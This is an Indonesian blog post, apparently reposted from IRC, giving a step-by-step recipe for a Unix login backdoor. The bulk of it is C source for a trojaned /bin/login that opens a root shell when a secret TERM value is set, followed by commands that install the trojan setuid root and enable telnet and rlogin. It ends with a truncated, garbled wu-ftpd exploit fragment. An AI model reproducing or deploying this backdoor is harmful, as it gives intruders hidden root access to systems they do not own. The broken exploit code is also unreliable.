0
merakit Telnetd / rlogin Backdoor

.
#making Telnetd / rlogin Backdoor
author syzwz
taken from bosen (telnetd backdor) aresu (fixed wuftpd)
this xploit(wuftd fixed) add at 1st Jan 2002 so if somebody in
indonesia tell to you another bosen or aresu
, he /her was found before 1st January 2002 he's lie or big lier or
whtf


cat >term.c <<__eof__
#define _XOPEN_SOURCE
#include
#include
#include
#include
#include

#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/xstat"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "anjing23"
#define ENV_FIX "vt100"

int owned(void);

char **av, **ep;

int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;

if (owned()) {
char *sav[]={
SHELL_CALLME, NULL
};

execve(SHELL, sav, ep);
return 0;
}
execve(LOGIN, av, ep);
return 0;
}

int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], "=");
value=strtok(NULL, "=");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
char tmp[100];
sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
ep[i]=strdup(tmp);
return 1;
}
}
}
return 0;
}
__eof__
echo " "
echo "..now loading"
gcc -o login term.c
chown root.bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
mv login /bin/login
chmod 555 /usr/bin/xstat
chown root.bin /usr/bin/xstat
rm -f term.c

//running telnet and rlogin(this one i like) port in xinetd

cat > /etc/xinetd.d/telnet <<__eof__

# default: on
service telnet
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/sbin/in.telnetd
log_on_failure += USERID
}
__eof__

cat > /etc/xinetd.d/rlogin <<__eof__
service login
{
socket_type = stream
wait = no
user = root
log_on_success += USERID
log_on_failure += USERID
server = /usr/sbin/in.rlogind

}
__eof__

/etc/rc.d/init.d/xinetd reload

Byte Code for RH7.0 WuFtpd

cat >distro.h<<__eof__
"RH7.0 - 2.6.1(1) Wed Aug 9 05:54:50 EDT 2000",
0x08070cb0,0x8084600, 0,
__eof__

realcode taken from
http://crash.ihug.co.nz/~Sneuro/woot-exploit.tar.gz / unfixed
//fix wuftpd rootkit

main(int argc,char *argv[])
{
int l,m,n=0,o;
int got,inp,prp,are;

//then it

if(sscanf(ADDR,"%u.%u.%u.%u",&o,&o,&o,&o)==4)n=1;
prp=st+45000;
are=0x8098930;
for(l=prp;l
//then

if(!ok)usleep(1500000);
else usleep(150000); // needed so u can actually stop it.. hold down
^C

//if not found, add by your self

Source: irc.centrin.net.id

Bookmark and Share



0 komentar :

Posting Komentar

Silahkan tinggalkan komentar anda disini...

 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com